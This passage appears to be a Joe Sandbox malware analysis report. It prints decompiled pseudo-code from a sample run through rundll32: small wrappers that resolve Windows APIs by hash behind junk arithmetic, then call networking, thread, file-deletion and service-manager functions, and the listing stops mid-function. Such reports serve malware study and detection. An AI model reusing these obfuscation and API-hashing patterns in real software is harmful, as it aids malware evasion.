Instruction Fuzzy Hash: 341164B5D0120DFBEB04DFE4D9468DEBBB4FF04300F208198E415A6261E3B45B548F80

Uniqueness

Uniqueness Score: -1.00%

Function 002E7998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E002E7998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002DE171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E002D606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

0x002e799e
0x002e79a1
0x002e79a4
0x002e79a9
0x002e79ae
0x002e79b5
0x002e79bc
0x002e79c3
0x002e79c7
0x002e79ce
0x002e79d5
0x002e79dc
0x002e79e3
0x002e79ea
0x002e79f1
0x002e79f5
0x002e79f9
0x002e79fd
0x002e7a04
0x002e7a0b
0x002e7a12
0x002e7a19
0x002e7a1d
0x002e7a30
0x002e7a37
0x002e7a3e
0x002e7a3f
0x002e7a4a
0x002e7a4f

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 002E7A4A

Strings

rV, xrefs: 002E79C7

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 3579dbe2716f49f86ab21cefec2b82da77ebb381ea17572b37b8d9f955c4b5f6
Instruction ID: f4f2e2bede5eda339d2333a5a62af1707979b29173f6a6bf23d85c6ceb5fa5ea
Opcode Fuzzy Hash: 3579dbe2716f49f86ab21cefec2b82da77ebb381ea17572b37b8d9f955c4b5f6
Instruction Fuzzy Hash: 411107B6D1160DFBDB14DFE4CC4A4DEBBB4FB00309F208588E52566250D3B48B149F50

Uniqueness

Uniqueness Score: -1.00%

Function 002E0DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E002E0DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002DE171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E002D606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

0x002e0deb
0x002e0dee
0x002e0df1
0x002e0df6
0x002e0dfb
0x002e0e04
0x002e0e0b
0x002e0e18
0x002e0e1c
0x002e0e1f
0x002e0e26
0x002e0e32
0x002e0e37
0x002e0e3a
0x002e0e41
0x002e0e4c
0x002e0e4d
0x002e0e4e
0x002e0e55
0x002e0e58
0x002e0e5f
0x002e0e66
0x002e0e6d
0x002e0e78
0x002e0e79
0x002e0e7c
0x002e0e8f
0x002e0e9a
0x002e0e9f

APIs

CloseHandle.KERNEL32(68F2FB55,?,?,?,?,?,?,?,?,002E96D7), ref: 002E0E9A

Strings

Hh, xrefs: 002E0E58

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: 2d30ca32a6ffc236798e9ff273862c0f2eed62329043bff5e7d1f285292a42a2
Instruction ID: 98514b5ee780f0c27afc1dd5e177c5c06be3837dc83a5139abbb0f1f56437260
Opcode Fuzzy Hash: 2d30ca32a6ffc236798e9ff273862c0f2eed62329043bff5e7d1f285292a42a2
Instruction Fuzzy Hash: 60110374D0020DEBEF05DFE8C9469AEBFB5EB40304F60C599E524AB261D3B95B118F40

Uniqueness

Uniqueness Score: -1.00%

Function 002E0BA4, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E002E0BA4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t41;
				intOrPtr* _t52;
				void* _t53;
				signed int _t55;
				signed int _t56;
				void* _t64;

				_t64 = __edx;
				E002DE171(_t41);
				_v36 = 0x6f8801;
				asm("stosd");
				_t55 = 0x2e;
				asm("stosd");
				asm("stosd");
				_v8 = 0x52d9;
				_t56 = 0x1e;
				_v8 = _v8 / _t55;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x0001c65e;
				_v20 = 0xdb10;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x00004b9a;
				_v16 = 0xdd62;
				_v16 = _v16 | 0xf543142e;
				_v16 = _v16 ^ 0xf543ddd0;
				_v12 = 0x8dc3;
				_v12 = _v12 / _t56;
				_v12 = _v12 ^ 0x000076e3;
				_t52 = E002D606F(0x31c, 0x5d4069a4, _t56, _t56, 0xc211d5d7);
				_t53 =  *_t52(0, _a12, _t64, __ecx, __edx, _a4, _a8, _a12, 0); // executed
				return _t53;
			}

0x002e0bb1
0x002e0bbb
0x002e0bc0
0x002e0bce
0x002e0bd1
0x002e0bd4
0x002e0bd5
0x002e0bd6
0x002e0be2
0x002e0be3
0x002e0be8
0x002e0bef
0x002e0bf6
0x002e0bfd
0x002e0c00
0x002e0c07
0x002e0c0e
0x002e0c15
0x002e0c1c
0x002e0c2d
0x002e0c35
0x002e0c4f
0x002e0c5d
0x002e0c64

APIs

ObtainUserAgentString.URLMON(00000000,00004B9A,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 002E0C5D

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AgentObtainStringUser
String ID:
API String ID: 2681117516-0
Opcode ID: b2c388cea8b45f713d3a9b1f8964a180a566a62310f5c234e0091ac6cfb6238e
Instruction ID: 77b7bdef1cda01d835901c9d6aab57741e766235074621bbb38f0033188ff5f4
Opcode Fuzzy Hash: b2c388cea8b45f713d3a9b1f8964a180a566a62310f5c234e0091ac6cfb6238e
Instruction Fuzzy Hash: 11212975E00208BBEF14DFD5C80AA9EBBB1FB48300F108059E515A7290D7B55A51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 002E063C, Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E002E063C(void* __ecx, void* __edx, intOrPtr _a8, _Unknown_base(*)()* _a12, intOrPtr _a16, void* _a24, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t38;
				void* _t46;

				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E002DE171(_t38);
				_v36 = 0x5d79d;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x21d9;
				_v12 = _v12 + 0xffffd1f5;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xf9e751c0;
				_v20 = 0x8632;
				_v20 = _v20 ^ 0xa6d456ee;
				_v20 = _v20 ^ 0xa6d4c126;
				_v8 = 0xd46a;
				_v8 = _v8 + 0xffff3ca6;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x1110320d;
				_v16 = 0x8d2;
				_v16 = _v16 ^ 0x8472359a;
				_v16 = _v16 ^ 0x84725201;
				E002D606F(0x2e3, 0xb6b01ae5, __ecx, __ecx, 0x63df9f97);
				_t46 = CreateThread(0, 0, _a12, _a24, 0, 0); // executed
				return _t46;
			}

0x002e0644
0x002e0649
0x002e064a
0x002e064b
0x002e064e
0x002e064f
0x002e0652
0x002e0655
0x002e0658
0x002e065a
0x002e065b
0x002e0660
0x002e066f
0x002e067a
0x002e0682
0x002e0683
0x002e068a
0x002e0691
0x002e0695
0x002e069c
0x002e06a3
0x002e06aa
0x002e06b1
0x002e06b8
0x002e06bf
0x002e06c3
0x002e06ca
0x002e06d1
0x002e06d8
0x002e06eb
0x002e06fd
0x002e0704

APIs

CreateThread.KERNEL32(00000000,00000000,A6D4C126,002D884A,00000000,00000000), ref: 002E06FD

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9c070597ed3d18c6187f82ba64d2acddff06ff290175d3099bbf60b555776235
Instruction ID: 7441698cffc24f86ead2c734b35f646fb28684eeec640f798bfc8543da469dbb
Opcode Fuzzy Hash: 9c070597ed3d18c6187f82ba64d2acddff06ff290175d3099bbf60b555776235
Instruction Fuzzy Hash: 0821E071802229BBDF159FE5CC4A8DFBFB5EF08350F008549F92566220D3B69A25DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002D93CC, Relevance: 1.6, APIs: 1, Instructions: 62
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E002D93CC(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t57;
				int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002DE171(_t57);
				_v16 = 0x9ea9;
				_v16 = _v16 + 0xa8b1;
				_t74 = 0x78;
				_v16 = _v16 / _t74;
				_v16 = _v16 ^ 0xbd2fcf5a;
				_v16 = _v16 ^ 0xbd2fc2f3;
				_v12 = 0x9cd0;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 | 0xcb308c1b;
				_v12 = _v12 + 0xffff28dd;
				_v12 = _v12 ^ 0xcb2ffc41;
				_v20 = 0xa381;
				_v20 = _v20 + 0xa50c;
				_v20 = _v20 ^ 0x0001067d;
				_v8 = 0x961e;
				_t75 = 0xe;
				_v8 = _v8 / _t75;
				_t76 = 0x19;
				_v8 = _v8 / _t76;
				_v8 = _v8 / _t76;
				_v8 = _v8 ^ 0x00000e66;
				E002D606F(0x292, 0x262cac91, _t76, _t76, 0x7a08e3ee);
				_t72 = InternetCloseHandle(_a4); // executed
				return _t72;
			}

0x002d93d2
0x002d93d5
0x002d93d8
0x002d93dd
0x002d93e2
0x002d93eb
0x002d93f7
0x002d93fc
0x002d9401
0x002d9408
0x002d940f
0x002d9416
0x002d941a
0x002d9421
0x002d9428
0x002d942f
0x002d9436
0x002d943d
0x002d9444
0x002d944e
0x002d9453
0x002d945b
0x002d9463
0x002d9470
0x002d9478
0x002d9492
0x002d949d
0x002d94a2

APIs

InternetCloseHandle.WININET(CB2FFC41,?,?,?,?,?,?,?,?,002EBF3A), ref: 002D949D

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet
String ID:
API String ID: 1081599783-0
Opcode ID: 756eaa2da845cfde3b0946ee700a212743a1c7d64e3cd5568a966b5b83bbab17
Instruction ID: 4e2add7d75f4dac787102a479880dfdfeb77b23703b002a76078cb58d3a43d63
Opcode Fuzzy Hash: 756eaa2da845cfde3b0946ee700a212743a1c7d64e3cd5568a966b5b83bbab17
Instruction Fuzzy Hash: 1F210775E00208EFEB48DFA5C84A9DEBBB1EB44304F10C589E814AA295D7B95B659F40

Uniqueness

Uniqueness Score: -1.00%

Function 002E97E2, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E002E97E2(void* __ecx, void* __edx, DWORD* _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t37;
				int _t45;

				_push(0);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E002DE171(_t37);
				_v12 = 0xac08;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x000296f1;
				_v20 = 0x60f3;
				_v20 = _v20 << 7;
				_v20 = _v20 ^ 0x0030678f;
				_v16 = 0xa02;
				_v16 = _v16 + 0xffff9052;
				_v16 = _v16 ^ 0xfffff28c;
				_v8 = 0x7c98;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x003a631f;
				E002D606F(0x11b, 0xb6b01ae5, __ecx, __ecx, 0x9b4def2a);
				_t45 = GetVolumeInformationW(_a16, 0, 0, _a8, 0, 0, 0, 0); // executed
				return _t45;
			}

0x002e97eb
0x002e97ec
0x002e97ef
0x002e97f2
0x002e97f5
0x002e97f6
0x002e97f7
0x002e97f8
0x002e97fb
0x002e97fe
0x002e9801
0x002e9803
0x002e9804
0x002e9809
0x002e9813
0x002e981c
0x002e9820
0x002e9827
0x002e982e
0x002e9832
0x002e9839
0x002e9840
0x002e9847
0x002e984e
0x002e9865
0x002e9868
0x002e986b
0x002e987e
0x002e9892
0x002e9898

APIs

GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,FFFFF28C,00000000,00000000,00000000,00000000), ref: 002E9892

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 90b67c2d00e979cf3e4ddb826130ea1a2e1c68c4bc0cb96d2cb91715836781cf
Instruction ID: 6698a8aadc4a72c2901cacec9ddeebbc9ba18ffb9a9ff92f5b3d079977622ceb
Opcode Fuzzy Hash: 90b67c2d00e979cf3e4ddb826130ea1a2e1c68c4bc0cb96d2cb91715836781cf
Instruction Fuzzy Hash: 33110675802228BBDF15DFA5CC4A8DFBFB9EF05364F108198F81962260D3759A20DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002DD4DC, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E002DD4DC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, struct _WIN32_FIND_DATAW* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t49;
				int _t61;
				signed int _t63;
				signed int _t64;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002DE171(_t49);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x48a732;
				_v28 = 0x114af7;
				_v8 = 0x7883;
				_t63 = 0x67;
				_v8 = _v8 / _t63;
				_t64 = 0x15;
				_v8 = _v8 / _t64;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x00004630;
				_v20 = 0x9dee;
				_v20 = _v20 + 0xffff65f1;
				_v20 = _v20 ^ 0x00000e1e;
				_v12 = 0x585d;
				_v12 = _v12 | 0xc384218c;
				_v12 = _v12 * 0x71;
				_v12 = _v12 ^ 0x4d7987e4;
				_v16 = 0x84a7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x00042c8c;
				E002D606F(0x142, 0xb6b01ae5, _t64, _t64, 0xc093297e);
				_t61 = FindNextFileW(_a12, _a16); // executed
				return _t61;
			}

0x002dd4e2
0x002dd4e5
0x002dd4e8
0x002dd4eb
0x002dd4f0
0x002dd4f5
0x002dd4fb
0x002dd502
0x002dd509
0x002dd515
0x002dd51a
0x002dd522
0x002dd52d
0x002dd530
0x002dd534
0x002dd53b
0x002dd542
0x002dd549
0x002dd550
0x002dd557
0x002dd56e
0x002dd571
0x002dd578
0x002dd57f
0x002dd583
0x002dd596
0x002dd5a4
0x002dd5a9

APIs

FindNextFileW.KERNEL32(00000E1E,00000000,?,?,?,?,?,?,?,?,?,000003D5), ref: 002DD5A4

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: a4293ad6bc18f7c0e48b1bb57c17bba87dbf413889f06720b3004ccbf768f501
Instruction ID: ead3a40f207a5c97d6167b7ca168c52a5697481ebb0d01f0268063e5c5330a69
Opcode Fuzzy Hash: a4293ad6bc18f7c0e48b1bb57c17bba87dbf413889f06720b3004ccbf768f501
Instruction Fuzzy Hash: 272115B5D0020DEBDF08DFE4C94A99EBBB2FB44304F108099E814AB250D7B59B249F81

Uniqueness

Uniqueness Score: -1.00%

Function 002E7FC8, Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E002E7FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002DE171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
				E002D606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

0x002e7fcf
0x002e7fd2
0x002e7fd4
0x002e7fd7
0x002e7fda
0x002e7fdd
0x002e7fdf
0x002e7fe4
0x002e7fed
0x002e7ff4
0x002e7ffb
0x002e8002
0x002e800e
0x002e8013
0x002e8018
0x002e801f
0x002e8029
0x002e8034
0x002e8037
0x002e803b
0x002e8042
0x002e8049
0x002e8050
0x002e806f
0x002e807e
0x002e8084

APIs

RtlAllocateHeap.NTDLL(216D57E9,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,216D57E9,216D57E9), ref: 002E807E

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1eec4910c5a80c3f0fbcf09dbddd4239708f1d9c1fc9dec4e27e2debbb81c624
Instruction ID: 7776d8e618cb481fb4862fe1290f11cb9a6da34bbd9994b085a046724e947327
Opcode Fuzzy Hash: 1eec4910c5a80c3f0fbcf09dbddd4239708f1d9c1fc9dec4e27e2debbb81c624
Instruction Fuzzy Hash: CF115971E00218EBEF04DFE5C90A8DEBFB2FB45310F108189EA146A250C3B69A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 002E4CEF, Relevance: 1.6, APIs: 1, Instructions: 54
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E002E4CEF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a28, long _a32) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t37;
				void* _t46;

				_push(_a32);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E002DE171(_t37);
				_v12 = 0xc991;
				_v12 = _v12 * 0x6c;
				_v12 = _v12 + 0xfb87;
				_v12 = _v12 ^ 0x00561402;
				_v20 = 0x6a66;
				_v20 = _v20 ^ 0x17a3a394;
				_v20 = _v20 ^ 0x17a3b314;
				_v8 = 0xc565;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 + 0xffff6f7c;
				_v8 = _v8 ^ 0x00142022;
				_v16 = 0xdacb;
				_v16 = _v16 + 0x8a3b;
				_v16 = _v16 ^ 0x00015fcf;
				E002D606F(0x112, 0x262cac91, __ecx, __ecx, 0xd4655b3d);
				_t46 = InternetOpenW(_a16, _a32, 0, 0, 0); // executed
				return _t46;
			}

0x002e4cf6
0x002e4cfb
0x002e4cfe
0x002e4cff
0x002e4d02
0x002e4d05
0x002e4d08
0x002e4d09
0x002e4d0d
0x002e4d0e
0x002e4d13
0x002e4d2c
0x002e4d2f
0x002e4d36
0x002e4d3d
0x002e4d44
0x002e4d4b
0x002e4d52
0x002e4d63
0x002e4d66
0x002e4d6d
0x002e4d74
0x002e4d7b
0x002e4d82
0x002e4d95
0x002e4da6
0x002e4dac

APIs

InternetOpenW.WININET(31BCED90,?,00000000,00000000,00000000), ref: 002E4DA6

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: c46726e834516cf19103e1f554e65535bb5b52e6b1168b066e67206e11f4e8a2
Instruction ID: 2a7f67a58d9c313782fb8d0192d671226b945fc571c7b12c83fa6ce89aff2f5a
Opcode Fuzzy Hash: c46726e834516cf19103e1f554e65535bb5b52e6b1168b066e67206e11f4e8a2
Instruction Fuzzy Hash: 38112F7080021DBBDF00DFA4C94A8DEBFB9FF08354F508188F81466260D3BA8A60DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002D8289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E002D8289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E002DE171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E002D606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

0x002d8290
0x002d8295
0x002d829a
0x002d82a8
0x002d82ab
0x002d82af
0x002d82b5
0x002d82b6
0x002d82bd
0x002d82c4
0x002d82c8
0x002d82cf
0x002d82d6
0x002d82dd
0x002d82e4
0x002d82eb
0x002d82f2
0x002d82f9
0x002d8300
0x002d8307
0x002d8311
0x002d8319
0x002d8332
0x002d833d
0x002d8343

APIs

DeleteFileW.KERNEL32(00001B6C,?,?,?,?,?,?,00000000), ref: 002D833D

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 0a0392e627c78325f35bc7f84c6802196a43d69676bf021ac56550ffddaf33b6
Instruction ID: 6046fa20194b2c30f5785bdfe72ec8f7efaa080facd8aa584f1535374843a87c
Opcode Fuzzy Hash: 0a0392e627c78325f35bc7f84c6802196a43d69676bf021ac56550ffddaf33b6
Instruction Fuzzy Hash: E8115B75E0120CFBEB08DFE9C84A5DEBBB5FB58304F108188E410A6264D3B84B198F50

Uniqueness

Uniqueness Score: -1.00%

Function 002E9EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E002E9EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E002DE171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E002D606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

0x002e9ef2
0x002e9ef7
0x002e9efa
0x002e9efb
